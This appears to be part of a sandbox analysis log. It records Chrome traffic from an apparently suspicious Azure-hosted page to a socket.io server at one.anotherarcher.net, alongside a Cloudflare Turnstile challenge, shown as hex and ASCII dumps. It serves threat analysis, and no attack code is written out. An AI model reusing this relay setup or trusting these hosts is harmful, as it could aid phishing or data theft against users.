                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 36 4f 73 64 48 74 36 76 61 65 53 6b 4c 47 65 72 73 4f 2f 75 72 36 65 6f 61 47 4a 68 38 69 4f 69 71 36 48 7a 4e 4b 52 6e 63 53 6a 6f 49 2f 57 72 4d 79 30 6d 4a 58 68 76 70 36 7a 34 4a 2b 34 76 73 6e 46 77 4b 50 42 78 2b 71 76 78 37 33 49 71 38 6e 7a 38 61 37 32 77 39 48 59 32 74 61 35 36 72 7a 39 30 37 58 6a 33 39 54 61 34 50 62 43 43 38 62 31 32 76 73 50 38 4d 7a 52 38 2b 2f 6b 42 78 55 45 44 66 50 63 2f 4f 6e 77 33 52 51 62 45 67 4d 50 4a 69 49 58 43 52 2f 6e 47 66 59 4e 2f 51 34 41 41 4f 76 6d 4b 43 6f 77 4f 53 6e 34 48 52 51 55 50 51 6e 79 49 67 4d 30 42 42 41 51 42 78 52 43 47 44 63 74 42 30 64 4a 50 54 4d 75 4b 7a 49 65 56 30 38 72 4d 55 39 58 47 31 77 33 51 46 52 5a 48 69 46 68 59 45 42 49 49 6c 55 70 4b 56 63 38 53 55 6c 53 58 7a 46 63 55 47 52 73
                                                                                                                                                                                                                                Data Ascii: 6OsdHt6vaeSkLGersO/ur6eoaGJh8iOiq6HzNKRncSjoI/WrMy0mJXhvp6z4J+4vsnFwKPBx+qvx73Iq8nz8a72w9HY2ta56rz907Xj39Ta4PbCC8b12vsP8MzR8+/kBxUEDfPc/Onw3RQbEgMPJiIXCR/nGfYN/Q4AAOvmKCowOSn4HRQUPQnyIgM0BBAQBxRCGDctB0dJPTMuKzIeV08rMU9XG1w3QFRZHiFhYEBIIlUpKVc8SUlSXzFcUGRs
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 47 49 6f 4b 4b 30 6f 61 2b 79 6a 38 57 78 6e 62 2b 34 70 35 6d 2f 6f 4d 43 76 78 35 48 4b 73 71 57 53 6f 4b 54 56 6f 36 2f 48 6d 72 79 61 75 37 36 74 30 61 36 33 30 4e 37 4a 75 4d 72 63 31 61 44 46 34 64 36 74 77 4d 76 68 72 4d 7a 4f 38 50 44 49 39 4c 72 55 2f 74 6e 2b 76 77 54 67 30 76 50 30 31 65 44 69 78 75 54 6f 37 73 58 6b 33 42 48 38 41 78 50 6c 79 63 72 56 39 78 6b 4a 35 2b 66 36 33 2f 50 68 45 64 33 58 35 52 6b 58 46 69 51 6f 43 53 38 6e 37 43 77 4e 48 2f 45 55 49 67 6b 79 41 68 45 34 4f 43 63 59 39 77 34 36 47 7a 2f 36 44 54 63 62 50 68 6f 61 47 6a 5a 48 52 79 6c 4a 54 44 4a 41 44 42 49 76 4a 69 34 5a 53 68 55 75 4c 43 64 56 54 43 74 53 50 78 30 2f 4c 6a 59 69 4b 56 34 69 49 30 6c 70 5a 57 4e 4e 51 31 73 6d 55 33 4e 74 62 33 68 70 61 55 70 4e 53
                                                                                                                                                                                                                                Data Ascii: GIoKK0oa+yj8Wxnb+4p5m/oMCvx5HKsqWSoKTVo6/Hmryau76t0a630N7JuMrc1aDF4d6twMvhrMzO8PDI9LrU/tn+vwTg0vP01eDixuTo7sXk3BH8AxPlycrV9xkJ5+f63/PhEd3X5RkXFiQoCS8n7CwNH/EUIgkyAhE4OCcY9w46Gz/6DTcbPhoaGjZHRylJTDJADBIvJi4ZShUuLCdVTCtSPx0/LjYiKV4iI0lpZWNNQ1smU3Ntb3hpaUpNS
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 67 6c 4c 36 43 6c 61 65 34 68 73 54 4d 69 62 79 6c 77 4d 4f 6b 72 4c 43 76 70 71 75 53 78 36 6e 57 33 35 7a 55 76 74 6e 63 32 39 37 55 6f 39 33 6e 31 64 57 69 31 74 7a 69 38 4b 66 48 39 4b 79 77 39 75 72 56 74 2b 6e 76 36 4d 75 36 74 2b 6d 35 31 37 37 63 31 39 33 35 41 73 50 6a 2f 73 59 4f 31 2f 6a 69 7a 51 2f 4f 34 75 76 71 47 52 6f 62 37 74 6a 7a 36 74 51 65 32 65 2f 2b 39 77 41 6a 42 53 67 44 49 76 51 63 46 69 6b 41 47 4f 7a 70 4d 53 59 79 4a 41 41 68 4c 51 77 75 4e 68 4d 33 4f 54 50 38 49 76 31 41 4c 7a 58 38 47 51 67 70 46 7a 63 6d 50 54 78 44 4b 51 67 72 48 52 55 73 52 43 6b 76 55 43 35 4c 55 6c 63 58 47 54 6f 68 47 30 77 31 58 57 42 6e 52 6a 6b 6a 49 7a 35 6b 4b 55 4a 52 61 47 4e 47 59 48 4a 76 51 6e 6f 79 55 31 42 30 65 6d 32 42 51 46 68 50 64 6c
                                                                                                                                                                                                                                Data Ascii: glL6Clae4hsTMibylwMOkrLCvpquSx6nW35zUvtnc297Uo93n1dWi1tzi8KfH9Kyw9urVt+nv6Mu6t+m5177c1935AsPj/sYO1/jizQ/O4uvqGRob7tjz6tQe2e/+9wAjBSgDIvQcFikAGOzpMSYyJAAhLQwuNhM3OTP8Iv1ALzX8GQgpFzcmPTxDKQgrHRUsRCkvUC5LUlcXGTohG0w1XWBnRjkjIz5kKUJRaGNGYHJvQnoyU1B0em2BQFhPdl


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                121192.168.2.44988179.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB7M_&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:34 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                122192.168.2.44988479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB6_F HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:34 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 4e 4d 6d 4d 51 36 44 78 42 62 79 34 5a 77 37 66 41 41 4e 66 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"NMmMQ6DxBby4Zw7fAANf","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                123192.168.2.44988379.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: MRLh/sgXupb+i3mMS/vyVw==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:34 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                124192.168.2.44988279.137.248.152443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB7N0&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:34 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 43 6b 62 4e 30 59 5a 72 70 72 2d 6e 64 39 5f 4a 41 41 4e 65 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"CkbN0YZrpr-nd9_JAANe"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                125192.168.2.449886104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC823OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:35 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 38 36 66 35 66 63 37 30 63 61 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd86f5fc70ca2-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
